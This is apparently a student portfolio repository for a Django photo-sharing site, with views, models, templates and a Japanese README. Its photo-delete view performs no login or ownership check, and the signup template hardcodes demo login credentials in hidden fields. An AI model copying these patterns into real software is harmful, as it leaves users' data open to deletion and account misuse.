"text": "from django.urls import path\nfrom . import views\nfrom django.contrib.auth import views as auth_views\n\napp_name = 'app'\nurlpatterns = [\n path('', views.index, name='index'),\n path('users/<int:pk>/', views.users_detail, name='users_detail'),\n path('photos/new/', views.photos_new, name='photos_new'),\n path('photos/<int:pk>/', views.photos_detail, name='photos_detail'),\n path('photos/<int:pk>/delete/', views.photos_delete, name='photos_delete'),\n path('photos/<str:category>/', views.photos_category, name='photos_category'),\n path('signup/', views.signup, name='signup'),\n path('login/', auth_views.LoginView.as_view(template_name='app/login.html'), name='login'),\n path('logout/', auth_views.LogoutView.as_view(), name='logout'),\n path('contact/', views.contact, name='contact'),\n #path('testuser/', views.contact, name='testuser'),\n path('user_information/<int:pk>/', views.UserDetail.as_view(), name='user_information'),\n path('user_update/<int:pk>/', views.UserUpdate.as_view(), name='user_update'),\n path('password_change/', views.PasswordChange.as_view(), name='password_change'),\n path('password_change/done/', views.PasswordChangeDone.as_view(), name='password_change_done'),\n path('photos/<int:pk>/like/', views.like, name='like'),\n path('user_list/<int:pk>/', views.user_list, name='user_list'),\n path('user_list/<int:pk>/follow/', views.follow, name='follow'),\n]\n"
},
{
"alpha_fraction": 0.6553488969802856,
"alphanum_fraction": 0.6587192416191101,
"avg_line_length": 33.645023345947266,
"blob_id": "62d87c44950a99c59e20aa05faae95c93b7e6032",
"content_id": "ec52a1c8b4ff6ea88f7ec803e88eed66f502ac07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 8569,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 231,
"path": "/app/views.py",
"repo_name": "Whiro0501/Django_SharePhoto",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import get_object_or_404, redirect, render\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth import authenticate, login\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import PhotoForm, MyPasswordChangeForm, UserUpdateForm, ContactForm\nfrom django.contrib import messages\nfrom django.views.decorators.http import require_POST\nfrom .models import Photo, Category, Like, Follow\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.db.models import Q\nfrom django.core.mail import send_mail\nfrom django.contrib.auth.views import PasswordChangeView, PasswordChangeDoneView\nfrom django.urls import reverse_lazy\nfrom django.shortcuts import redirect, resolve_url\nfrom django.views import generic\nfrom django.contrib.auth.mixins import UserPassesTestMixin\nfrom django.http import HttpResponseRedirect\n\nclass OnlyYouMixin(UserPassesTestMixin):\n raise_exception = True\n\n def test_func(self):\n user = self.request.user\n return user.pk == self.kwargs['pk'] or user.is_superuser\n\n\nclass UserDetail(OnlyYouMixin, generic.DetailView):\n model = User\n template_name = 'app/user_detail.html'\n\n\nclass UserUpdate(OnlyYouMixin, generic.UpdateView):\n model = User\n form_class = UserUpdateForm\n template_name = 'app/user_form.html'\n\n def get_success_url(self):\n return resolve_url('app:user_detail', pk=self.kwargs['pk'])\n\nclass PasswordChange(PasswordChangeView):\n \"\"\"パスワード変更ビュー\"\"\"\n form_class = MyPasswordChangeForm\n success_url = reverse_lazy('app:password_change_done')\n template_name = 'app/password_change.html'\n\n\nclass PasswordChangeDone(PasswordChangeDoneView):\n \"\"\"パスワード変更しました\"\"\"\n template_name = 'app/password_change_done.html'\n\n\n\n\ndef paginate_queryset(request, queryset, count):\n\n paginator = Paginator(queryset, count)\n page = request.GET.get('page')\n try:\n page_obj = paginator.page(page)\n except PageNotAnInteger:\n page_obj = paginator.page(1)\n except EmptyPage:\n page_obj = paginator.page(paginator.num_pages)\n return page_obj\n\n\n\ndef index(request):\n photos = Photo.objects.all().order_by('-created_at')\n photo_filter = Photo.objects.all().order_by('-created_at')\n page_obj = paginate_queryset(request, photos, 6)\n keyword = request.GET.get('keyword')\n if keyword:\n page_obj = photos.filter(\n Q(title__icontains=keyword) | Q(comment__icontains=keyword)\n )\n context = {\n # 'photos': page_obj.object_list,\n 'photos': page_obj,\n 'page_obj': page_obj,\n 'keyword': photo_filter,\n }\n return render(request, 'app/index.html', context)\n\n\ndef users_detail(request, pk):\n user = get_object_or_404(User, pk=pk)\n #photo_filter = Photo.objects.all().order_by('-created_at', 'user').filter(user=pk)\n photo_filter = Photo.objects.all().order_by('-created_at')\n photos = user.photo_set.all().order_by('-created_at')\n page_obj = paginate_queryset(request, photos, 6)\n keyword = request.GET.get('keyword')\n if keyword:\n photos = photos.filter(\n Q(title__icontains=keyword) | Q(comment__icontains=keyword)\n )\n \"\"\"elseの中をいかにしたらできた。要はページングと被ってる\"\"\"\n else:\n photos = page_obj\n context = {\n 'user': user,\n 'photos': photos,\n 'page_obj': page_obj,\n 'keyword': photo_filter,\n }\n return render(request, 'app/users_detail.html', context)\n\ndef signup(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST) # ユーザーインスタンスを作成\n if form.is_valid():\n new_user = form.save() # ユーザーインスタンスを保存\n input_username = form.cleaned_data['username']\n input_password = form.cleaned_data['password1']\n # フォームの入力値で認証できればユーザーオブジェクト、できなければNoneを返す\n new_user = authenticate(username=input_username, password=input_password)\n # 認証成功時のみ、ユーザーをログインさせる\n if new_user is not None:\n # loginメソッドは、認証ができてなくてもログインさせることができる。→上のauthenticateで認証を実行する\n login(request, new_user)\n return redirect('app:users_detail', pk=new_user.pk)\n else:\n form = UserCreationForm()\n return render(request, 'app/signup.html', {'form': form})\n\n@login_required\ndef photos_new(request):\n keyword = request.GET.get('keyword')\n\n if request.method == \"POST\":\n form = PhotoForm(request.POST, request.FILES)\n if form.is_valid():\n photo = form.save(commit=False)\n photo.user = request.user\n photo.save()\n messages.success(request, \"投稿が完了しました!\") # 追加\n return redirect('app:users_detail', pk=request.user.pk)\n else:\n form = PhotoForm()\n return render(request, 'app/photos_new.html', {'form': form})\n\ndef photos_detail(request, pk):\n photo = get_object_or_404(Photo, pk=pk)\n return render(request, 'app/photos_detail.html', {'photo': photo})\n\n@require_POST\ndef photos_delete(request, pk):\n photo = get_object_or_404(Photo, pk=pk)\n photo.delete()\n return redirect('app:users_detail', request.user.id)\n\n\ndef photos_category(request, category):\n # titleがURLの文字列と一致するCategoryインスタンスを取得\n category = Category.objects.get(title=category)\n # 取得したCategoryに属するPhoto一覧を取得\n photos = Photo.objects.filter(category=category).order_by('-created_at')\n return render(request, 'app/index.html', {'photos': photos, 'category':category})\n\ndef contact(request):\n keyword = request.GET.get('keyword')\n\n if request.method == \"POST\":\n form = ContactForm(request.POST, request.FILES)\n if form.is_valid():\n cantact = form.save(commit=False)\n #cantact.user = request.user\n cantact.save()\n mail(request)\n messages.success(request, \"お問い合わせが完了しました!\") # 追加\n return redirect('app:index', )\n else:\n form = ContactForm()\n return render(request, 'app/contact.html', {'form': form})\n\ndef mail(request):\n\n if request.method == \"POST\":\n\n subject = request.POST.get('title')\n message = request.POST.get('content')\n from_email = request.POST.get('email')\n recipient_list = [\n \"[email protected]\"\n ]\n\n send_mail(subject, message, from_email, recipient_list)\n\n@login_required\ndef like(request, pk):\n photos = get_object_or_404(Photo, pk=pk)\n is_like = Like.objects.filter(user=request.user).filter(photos=photos).count()\n if is_like > 0:\n liking = Like.objects.get(user=request.user, photos_id=pk)\n liking.delete()\n photos.like_num -= 1\n photos.save()\n messages.warning(request, 'いいねを取り消しました')\n return redirect('app:photos_detail', photos.id)\n else:\n photos.like_num += 1\n photos.save()\n like = Like()\n like.user = request.user\n like.photos = photos\n like.save()\n messages.success(request, 'いいね!しました')\n return redirect('app:photos_detail', photos.id)\n\ndef user_list(request, pk):\n users = User.objects.all()\n follow = Follow.objects.all()\n request_user = get_object_or_404(User, pk=pk)\n # users = get_object_or_404(User)\n return render(request, 'app/user_list.html', {'users': users, 'request_user': request_user, 'follow': follow})\n\n@login_required\ndef follow(request, pk):\n follower = User.objects.get(username=request.user)\n following = User.objects.get(pk=pk)\n if follower == following:\n messages.warning(request, '自分自身はフォローできません')\n else:\n if not Follow.objects.filter(follower=follower, following=following).exists():\n Follow(follower=follower, following=following).save()\n messages.warning(request, 'フォローしました')\n else:\n Follow.objects.filter(follower=follower, following=following).delete()\n messages.warning(request, 'フォローを外しました')\n return redirect('app:user_list', request.user.id)\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.6266582608222961,
"alphanum_fraction": 0.6266582608222961,
"avg_line_length": 28.88679313659668,
"blob_id": "0cdb69d81c2693f0d20247e482a1b15108ba1d63",
"content_id": "507d3dda6687cb90928f69a91da3bbc6862eea7d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1661,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 53,
"path": "/app/forms.py",
"repo_name": "Whiro0501/Django_SharePhoto",
"src_encoding": "UTF-8",
"text": "from django.forms import ModelForm\nfrom .models import Photo, Contact\nfrom django import forms\nfrom django.core.mail import send_mail\nfrom django.conf import settings\nfrom django.contrib.auth.forms import PasswordChangeForm\nfrom django.contrib.auth.models import User\n\nclass PhotoForm(ModelForm):\n class Meta:\n model = Photo\n fields = ['title', 'comment', 'image', 'category']\n\n\nclass ContactForm(ModelForm):\n class Meta:\n model = Contact\n fields = ['title', 'name', 'email', 'content']\n\nclass UserUpdateForm(forms.ModelForm):\n \"\"\"ユーザー情報更新フォーム\"\"\"\n\n class Meta:\n model = User\n fields = ('username', 'last_name', 'first_name', 'email')\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in self.fields.values():\n field.widget.attrs['class'] = 'form-control'\n\n\nclass MyPasswordChangeForm(PasswordChangeForm):\n \"\"\"パスワード変更フォーム\"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n for field in self.fields.values():\n field.widget.attrs['class'] = 'form-control'\n\n\n # name = forms.CharField() # 名前\n # message = forms.CharField(widget=forms.Textarea) #問い合わせ内容\n #\n # # メール送信処理\n # def send_email(self):\n # # send email using the self.cleaned_data dictionary\n # subject = self.cleaned_data['name']\n # message = self.cleaned_data['message']\n # from_email = settings.EMAIL_BACKEND\n # #to = [settings.EMAIL_BACKEND\n #\n # send_mail(subject, message, from_email, to )"
},
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.692307710647583,
"avg_line_length": 26.962963104248047,
"blob_id": "4d3d3841a2f9b176ed83c85e446d251a25f4eac5",
"content_id": "c11563bba83baefd94c23173c3c3096c83d51795",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 754,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 27,
"path": "/app/admin.py",
"repo_name": "Whiro0501/Django_SharePhoto",
"src_encoding": "UTF-8",
"text": "from django.contrib import admin\nfrom .models import Photo, Category, Like, Follow\n\nclass CategoryAdmin(admin.ModelAdmin):\n list_display = ('id', 'title')\n list_display_links = ('id', 'title')\n\n\nclass PhotoAdmin(admin.ModelAdmin):\n list_display = ('id', 'title')\n list_display_links = ('id', 'title')\n\n\nclass LikeAdmin(admin.ModelAdmin):\n list_display = ('id', 'user', 'photos')\n list_display_links = ('id', 'user', 'photos')\n\n\nclass FollowAdmin(admin.ModelAdmin):\n list_display = ('id', 'follower', 'following')\n list_display_links = ('id', 'follower', 'following')\n\n\nadmin.site.register(Category, CategoryAdmin)\nadmin.site.register(Photo, PhotoAdmin)\nadmin.site.register(Like, LikeAdmin)\nadmin.site.register(Follow, FollowAdmin)"
},
{
"alpha_fraction": 0.7015404105186462,
"alphanum_fraction": 0.7079589366912842,
"avg_line_length": 31.47916603088379,
"blob_id": "40cfd20ab63e964c9e55a2f01ea3caeabd4fb6ad",
"content_id": "6ed120028dabe165ca5723066b4b01f911155379",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1570,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 48,
"path": "/app/models.py",
"repo_name": "Whiro0501/Django_SharePhoto",
"src_encoding": "UTF-8",
"text": "from django.db import models\nfrom django.contrib.auth.models import User\n\n\n# Categoryモデルを作成\nclass Category(models.Model):\n title = models.CharField(max_length=20)\n\n def __str__(self):\n return self.title\n\n\nclass Photo(models.Model):\n title = models.CharField(max_length=150)\n comment = models.TextField(blank=True)\n image = models.ImageField(upload_to = 'photos')\n category = models.ForeignKey(Category, on_delete=models.PROTECT)\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n created_at = models.DateTimeField(auto_now=True)\n like_num = models.IntegerField(default=0)\n\n def __str__(self):\n return self.title\n\nclass Contact(models.Model):\n title = models.CharField(max_length=50)\n name = models.CharField(max_length=50)\n email = models.EmailField(blank=True)\n content = models.TextField(blank=False)\n created_at = models.DateTimeField(auto_now=True)\n\n def __str__(self):\n return self.title\n\n\nclass Like(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE,)\n photos = models.ForeignKey(Photo, on_delete=models.CASCADE)\n date_created = models.DateTimeField(auto_now_add=True)\n\n\nclass Follow(models.Model):\n follower = models.ForeignKey(User, related_name='follower', on_delete=models.CASCADE)\n following = models.ForeignKey(User, related_name='following', on_delete=models.CASCADE)\n date_created = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return \"{} : {}\".format(self.follower.username, self.following.username)"
},
{
"alpha_fraction": 0.5830346345901489,
"alphanum_fraction": 0.5902031064033508,
"avg_line_length": 25.1875,
"blob_id": "4a8260ca6e3ab31020e7ea13582f21e1541d80eb",
"content_id": "2992a1103226566209651ab8cc684b218152e050",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 931,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 32,
"path": "/app/templates/app/signup.html",
"repo_name": "Whiro0501/Django_SharePhoto",
"src_encoding": "UTF-8",
"text": "{% extends 'app/base.html' %}\n\n{% block content %}\n\n<h2>サインアップ</h2>\n\n<form method=\"post\" action=\"{% url 'app:signup' %}\">{% csrf_token %}\n <label>ユーザー名</label>\n {{ form.username }}\n {{ form.username.errors }}\n <br>\n <label>パスワード</label>\n {{ form.password1 }}\n {{ form.password1.errors }}\n <br>\n <label>パスワード(確認)</label>\n {{ form.password2 }}\n {{ form.password2.errors }}\n <br>\n <input type=\"submit\" value=\"登録する\">\n</form>\n\n<p><a href=\"{% url 'app:login' %}\">ログインはこちら</a></p>\n\n<form class=\"\" method=\"post\" action=\"{% url 'app:login' %}\">{% csrf_token %} \n\n <input type=\"hidden\" value=\"testuser\" name=\"username\">\n <input type=\"hidden\" value=\"Testp@ssw0rd\" name=\"password\">\n <input type=\"submit\" class=\"btn btn-primarybtn btn-primary\" name=\"testuser\" value=\"テストユーザでログイン\">\n</form>\n\n{% endblock %}"
},
{
"alpha_fraction": 0.49473685026168823,
"alphanum_fraction": 0.5789473652839661,
"avg_line_length": 20.11111068725586,
"blob_id": "f84c6353d37bf74fc8ce7a580b17dd442b0f33b0",
"content_id": "64144778c6ee0360a54e558b4cb2501fa6fcd919",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 380,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 18,
"path": "/app/migrations/0008_photo_like_num.py",
"repo_name": "Whiro0501/Django_SharePhoto",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.2.3 on 2019-07-27 14:17\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app', '0007_auto_20190727_2016'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='photo',\n name='like_num',\n field=models.IntegerField(default=0),\n ),\n ]\n"
},
{
"alpha_fraction": 0.48973608016967773,
"alphanum_fraction": 0.5454545617103577,
"avg_line_length": 17.94444465637207,
"blob_id": "d02f3917abba496227809921681ed0c3fa2cd02c",
"content_id": "989d5d4f0694de6cf211510b56585b1fa0fb67cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 341,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 18,
"path": "/app/migrations/0007_auto_20190727_2016.py",
"repo_name": "Whiro0501/Django_SharePhoto",
"src_encoding": "UTF-8",
"text": "# Generated by Django 2.2.3 on 2019-07-27 11:16\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('app', '0006_like'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='like',\n old_name='post',\n new_name='photos',\n ),\n ]\n"
},
{
"alpha_fraction": 0.7180650234222412,
"alphanum_fraction": 0.7505668997764587,
"avg_line_length": 14.325581550598145,
"blob_id": "cd6697d9460e148e37a5007ecb6f66a4c6a30e60",
"content_id": "2b1ca269f1f9456d2acf12d9513feee89814ed3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 2659,
"license_type": "no_license",
"max_line_length": 124,
"num_lines": 86,
"path": "/README.md",
"repo_name": "Whiro0501/Django_SharePhoto",
"src_encoding": "UTF-8",
"text": "# Hirogram\n自分の大好きなことを友達に共有するアプリです。\n※現在アプリは停止しています。\n\n<img alt=\"トップ\" src=\"https://user-images.githubusercontent.com/36604680/68087603-e4e2d380-fe9a-11e9-8c5d-7fa915fbf1c8.png\" />\n\n\nURL: https://hirogram.ga\n\n# 使用技術\n\n- Python 3.7.3\n- Django 2.2.3\n- SQlite3\n- bootstrap\n- jQuery\n- AWS\n - EC2\n - VPC\n - Subnet\n - Internet Getway\n - ALB\n - ACM\n - Route53\n - CloudWatch\n - IAM\n - スナップショット\n- Github\n- Pycharm\n\n# 開発環境\nエディターにはPycharmを使用しアプリの開発を行いました。\n\n# 本番環境\n本番環境はAWSへデプロイしました。\n\nAWSに関しては、このアプリでの開発ではシンプルな構成としました。\n\n理由としては別にRailsでアプリを開発しており、そちらでDockerの開発環境、\nCI/CDの自動化やECSなどでオートスケーリングを行なっているからです。\n\n# 機能一覧\n- 記事機能\n - タイムライン(新着順)\n - ユーザ投稿一覧(新着順)\n - 画像アップロード\n - 記事投稿機能\n - ページネーション機能\n- ユーザ機能\n - ユーザ登録・ログインログアウト機能全般\n - ユーザ 一覧表示機能\n - 簡単ログイン\n- フォロー機能\n -相互フォロー機能\n- いいね機能\n - 投稿記事へのいいね\n- 管理者機能\n- ダグ機能\n - タグ検索\n- 検索機能\n - title、bodyの検索\n- お問い合わせ機能\n- プロフィール情報\n - ユーザ情報変更\n - ユーザ 一覧表示機能\n - ユーザ 一覧表示機能\n - パスワード変更機能\n\n# 頑張ったところ\n -アプリケーションの機能の多さ\n \n -DjangoはRailsと比べて日本語の資料が圧倒的に少ないため\n Djangoでポートフォリオを作ること自体が難しかったが、\n 自分でQiitaやチュートリアル、海外サイトを通して\n 情報を収集したため、その自走力を見ていただきたい。\n\n-個人的にはPythonの文法がある程度分かっているためか、\n RailsよりDjangoの方が簡単だったと思える。\n\n# 改善点\n-Djangoでの開発時にGithubの使い方を知らず、\n PushしていなかったためGithubを想定した開発ができなかった。\n しかし次に行なっているRailsでの開発にてGithubを使用して開発を行なっている。\n\n-時間が無くAWSやDockerでの実装ができなかった。\n こちらもRailsでの開発にてメインで実装しているためインフラ部分もアピールできると思われる。\n \n\n\n\n"
}
] | 10 |
Olmer1st/simple_tasks
|
https://github.com/Olmer1st/simple_tasks
|
4d8f6a2bc96d05bc7a42192dd858516e6445199d
|
5f5ccc3756d4882a38a5dfd8ecf8e34c0bff9a26
|
d1d474f81cf2a0d4a58b074e5d6edef86568bf47
|
refs/heads/master
| 2016-09-13T02:43:24.769632 | 2016-05-29T13:55:58 | 2016-05-29T13:55:58 | 57,590,443 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6666666865348816,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 17,
"blob_id": "f935f1725912d388585d99d7400ad2b312306f2c",
"content_id": "f300ac872682d4aa224dda24cce25a5116f2edbb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 36,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 2,
"path": "/middleware/authentication.py",
"repo_name": "Olmer1st/simple_tasks",
"src_encoding": "UTF-8",
"text": "def check_token():\n return False\n"
},
{
"alpha_fraction": 0.7749999761581421,
"alphanum_fraction": 0.7749999761581421,
"avg_line_length": 18,
"blob_id": "6478e37f70e9d24f92e5e834122517b58048f3ca",
"content_id": "ddca480bd062b8b27fb282788c034bc6ae6e9e3c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 40,
"license_type": "no_license",
"max_line_length": 22,
"num_lines": 2,
"path": "/README.md",
"repo_name": "Olmer1st/simple_tasks",
"src_encoding": "UTF-8",
"text": "# simple_tasks\nSimple tasks managment\n\n\n"
},
{
"alpha_fraction": 0.40306681394577026,
"alphanum_fraction": 0.40306681394577026,
"avg_line_length": 22.41025733947754,
"blob_id": "68581b96b138fbc23933e6820f2aed00aaf14694",
"content_id": "a5adff81d1ec1492baf3e95dbe0ea8c44025b174",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 913,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 39,
"path": "/public/javascript/controllers/homeController.js",
"repo_name": "Olmer1st/simple_tasks",
"src_encoding": "UTF-8",
"text": "\"use strict\";\nmain_app.controller(\"homeController\", function($scope, $rootScope, $location) {\n $scope.categories = {\n values: [{\n name: \"Releases\",\n desc: \"Release managment\",\n title: \"Release managment\",\n status: {\n open: false\n }\n }, {\n name: \"Maintenance\",\n desc: \"Maintenance managment\",\n title: \"Application support\",\n status: {\n open: false\n }\n }, {\n name: \"Projects\",\n desc: \"Projects managment\",\n title: \"Projects managment\",\n status: {\n open: false\n }\n }, {\n name: \"IT\",\n desc: \"IT managment\",\n title: \"IT managment\",\n status: {\n open: false\n }\n }],\n isOpen: true\n\n };\n\n\n\n});\n"
},
{
"alpha_fraction": 0.6599099040031433,
"alphanum_fraction": 0.6599099040031433,
"avg_line_length": 28.600000381469727,
"blob_id": "5400116672509b916618d78437004e919bac2975",
"content_id": "3468eb3e9fdaa50aa4e46f48e19675aaf7fd2fc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 444,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 15,
"path": "/app.py",
"repo_name": "Olmer1st/simple_tasks",
"src_encoding": "UTF-8",
"text": "import os\nfrom flask import Flask, render_template\n\n# template_dir = os.path.dirname(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\n# template_dir = os.path.join(template_dir, 'public')\napp = Flask(__name__, template_folder='public', static_folder='public')\n\[email protected]('/', defaults={'p': 'home'})\[email protected]('/<path:p>')\ndef main(p):\n return render_template('index.html')\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n"
},
{
"alpha_fraction": 0.5289443731307983,
"alphanum_fraction": 0.5300794839859009,
"avg_line_length": 30.464284896850586,
"blob_id": "a05342ac7f23578972b78cf202b7d32b26364658",
"content_id": "374203bffb39855961f26c47fe8d8d27e9d329c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 881,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 28,
"path": "/public/javascript/app.js",
"repo_name": "Olmer1st/simple_tasks",
"src_encoding": "UTF-8",
"text": "\"use strict\";\nvar main_app = angular.module('main_app', ['ngSanitize','ui.router', 'ui.bootstrap', 'ngCookies']);\n\n\nmain_app.config(function ($locationProvider) {\n $locationProvider.html5Mode(true);\n});\n\nmain_app.config(function ($stateProvider, $urlRouterProvider) {\n $stateProvider\n .state('home', {\n url: '/home',\n templateUrl: 'public/partials/content.html',\n controller: 'homeController'\n })\n .state('login', {\n url: '/login',\n templateUrl: 'public/partials/login.html',\n controller: 'loginController'\n })\n .state('admin', {\n url: '/admin',\n templateUrl: 'public/partials/admin.html',\n controller: 'adminController'\n });\n\n $urlRouterProvider.otherwise('/home');\n});\n"
}
] | 5 |
zyx1001/plate_detection
|
https://github.com/zyx1001/plate_detection
|
d5e287880ea27d1fd70f8ee13d612a9677fc7674
|
20eca6c5e1a2a6982869ae5d19da97ac9e94f3b5
|
2405c57296cbe3d9328ddcb81dba282b358a60f7
|
refs/heads/master
| 2020-11-28T22:49:44.338357 | 2019-12-24T14:46:42 | 2019-12-24T14:46:42 | 229,941,140 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5661538243293762,
"alphanum_fraction": 0.6553846001625061,
"avg_line_length": 26.16666603088379,
"blob_id": "c02e6d1c021e288ef11e00e82e9db079846b8663",
"content_id": "48de8e8f46ed661cd8ea8e92512ece5ec3ec426b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 325,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 12,
"path": "/src/test.py",
"repo_name": "zyx1001/plate_detection",
"src_encoding": "UTF-8",
"text": "# import cv2\n# import torch\n# img=cv2.imread('/home/zyx/Pictures/Autumn_in_Kanas_by_Wang_Jinyu.jpg')\n#\n# # cv2.rectangle(img,(100,200),(900,900),(0,255,0),2)\n# # cv2.imshow('test',img)\n# # cv2.waitKey(3000)\n# print(torch.__version__)\n# print(torch.cuda.is_available())\n# print('hello world')\nfor i in range(1,7):\n print(i)"
},
{
"alpha_fraction": 0.4254518151283264,
"alphanum_fraction": 0.4864457845687866,
"avg_line_length": 36.91428756713867,
"blob_id": "f87d23c4d80e6b49c83da881aafa226e1c6df950",
"content_id": "00be60713eea9f5984b9dee2963e283211e800f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1452,
"license_type": "no_license",
"max_line_length": 117,
"num_lines": 35,
"path": "/src/dataLoader/ccpdDataReader.py",
"repo_name": "zyx1001/plate_detection",
"src_encoding": "UTF-8",
"text": "# 车牌所需字符\nprovinces = [\"皖\", \"沪\", \"津\", \"渝\", \"冀\", \"晋\", \"蒙\", \"辽\", \"吉\", \"黑\", \"苏\", \"浙\", \"京\", \"闽\", \"赣\", \"鲁\", \"豫\", \"鄂\", \"湘\", \"粤\", \"桂\",\n \"琼\", \"川\", \"贵\", \"云\", \"藏\", \"陕\", \"甘\", \"青\", \"宁\", \"新\", \"警\", \"学\", \"O\"]\n\nads = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'J', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X',\n 'Y', 'Z', '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'O']\n\nclass ccpdDataReader(object):\n\n # 返回图片对应的车牌框位置\n @staticmethod\n def readCCPDtoRectangle(path):\n list=path.split('-')\n loc_rectangle=list[2]\n left_top=loc_rectangle.split('_')[0]\n right_bottom=loc_rectangle.split('_')[1]\n left=left_top.split('&')[0]\n top=left_top.split('&')[1]\n right=right_bottom.split('&')[0]\n bottom=right_bottom.split('&')[1]\n return left,right,bottom,top\n\n # 返回图片对应的车牌号码\n @staticmethod\n def readCCPDtoPlateNum(path):\n list = path.split('-')\n pln=[]\n pln_oringin=list[4]\n pln_oringin=pln_oringin.split('_')\n pln.append(provinces[int(pln_oringin[0])])\n for i in range(1,7):\n pln.append(ads[int(pln_oringin[i])])\n return pln\nexample='025-95_113-154&383_386&473-386&473_177&454_154&383_363&402-0_0_22_27_27_33_16-37-15.jpg'\nprint(ccpdDataReader.readCCPDtoPlateNum(example))\n\n"
}
] | 2 |
ayd0427/Final-HW
|
https://github.com/ayd0427/Final-HW
|
333be40d225d65d049196483df41dff3448cd50d
|
a1e06a439c8c7ca128aa77d5bb96d369d978943e
|
eb27093a53fe1e1cf1a0af06d9127c115a1b7857
|
refs/heads/master
| 2020-05-28T11:06:10.878549 | 2019-06-04T08:07:43 | 2019-06-04T08:07:43 | 188,979,152 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5394260287284851,
"alphanum_fraction": 0.5787127614021301,
"avg_line_length": 23.111888885498047,
"blob_id": "61146aa2f9214fa1dcb66312aae8516f7e6b09f3",
"content_id": "a12a66cb29156f17088ab56e8f8007e6a6b416a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4821,
"license_type": "no_license",
"max_line_length": 75,
"num_lines": 143,
"path": "/201529154_안용덕_기말과제.py",
"repo_name": "ayd0427/Final-HW",
"src_encoding": "UTF-8",
"text": "import pandas as pd\r\nimport sys #프로그램 종료를 위해 import\r\n\r\ndf = pd.read_csv('origin.csv') #수입 원산지 제공 공공데이터\r\n\r\n#1. 수입되는 수산물 품목의 종류를 제공(출력)\r\ndf1 = df.iloc[1773:,7] #origin.csv에서 종류 추출, 1773이 수입 처음\r\n#print(df1) #품목들 출력\r\n\r\nmatrix = [] # 상세한 품목 종류를 저장할 리스트\r\nfor indata in df1:\r\n indata = indata.replace(\"'\", \"\") # ' 을 공백으로 변환\r\n matrix.append(indata) #변환된 목록들을 리스트로 추가\r\n\r\nmatrix2 = [] # 간단한 품목 종류를 저장할 리스트\r\nfor indata1 in df1:\r\n indata1 = indata1.replace(\"'\", \"\") # ' 을 공백으로 변환\r\n indata1 = indata1.split(\"(\") # ( 를 기준으로 리스트형식으로 분리 후\r\n del(indata1[1:]) # 뒤에 내용 삭제\r\n indata1 = indata1.pop() #리스트 안에 리스트를 넣게되어서 그전에 값만 추출\r\n #print(indata1)\r\n matrix2.append(indata1)\r\n\r\nuser_num = input(\"품목종류(번호입력) : 1. 상세히 2. 간단히\")\r\n\r\nif user_num == '1' :\r\n print(matrix) #리스트화 된 상세한 목록들 출력\r\n print()\r\nelif user_num == '2':\r\n print(matrix2) #리스트화 된 간단한 목록들 출력\r\n print()\r\nelse :\r\n 